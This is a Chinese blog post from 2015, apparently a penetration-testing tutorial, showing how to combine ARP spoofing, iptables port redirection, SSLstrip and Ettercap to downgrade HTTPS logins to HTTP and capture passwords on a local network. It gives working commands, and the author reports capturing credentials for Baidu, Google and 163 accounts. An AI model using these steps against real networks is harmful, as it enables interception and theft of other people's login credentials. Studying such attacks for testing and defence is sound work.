注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

熊猫正正的博客

熊猫正正的天空

 
 
 

日志

 
 

SSLstrip 中间人欺骗Https转Http获取密码  

2015-01-03 14:25:45|  分类: 渗透测试 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |
渗透回顾

SSLstrip + EtterCap 中间人攻击实现https转换成http 以获取帐号密码。

Linux环境下 我们使用iptables过滤一下数据包,然后用sslstrip监听端口,获取数据。

数据包转发 echo 1 > /pro/sys/net/ipv4/ip_forward

然后开启Ettercap的iptables 功能

clip_image001

clip_image003

把注析去掉

来个arp欺骗不使用sslstrip 来测试一下https

Arpspoof –i –eth0 –t 192.168.1.102 192.168.1.2

clip_image005

Ok

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

NAT 一定的基础

-T 匹配的表 NAT表 :PREROUTING 修改来的包

:OUTPUT 修改路由前本地的包

:POSTROUTING 修改准备发出的包

-A 表示加入高级选项

-P 协议类型

-J 表示把目标80端口的数据包转到其他端口 上诉命令是10000端口

开启ETTERCAP

Ettercap –T –q –I eth0

clip_image007

clip_image009

登录http的百度 效果良好

监听到数据了

clip_image011

clip_image013

登录google

发现在https 卡顿 无法通过

clip_image014

开启sslstrip

clip_image016

clip_image018

再向google登录的时候 https变成http

clip_image020

成功登录

加载中...

监听到帐号密码

clip_image024

百度的

clip_image026

clip_image028

163的登录

clip_image030

http的跳转

clip_image032

网速过慢……

除了使用arpspoof 还可以使用

Ettercap –T –q –M arp:remote /192.168.1.101/ //

也是arp欺骗 原理一样的

  评论这张
 
阅读(85)| 评论(0)
推荐 转载

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017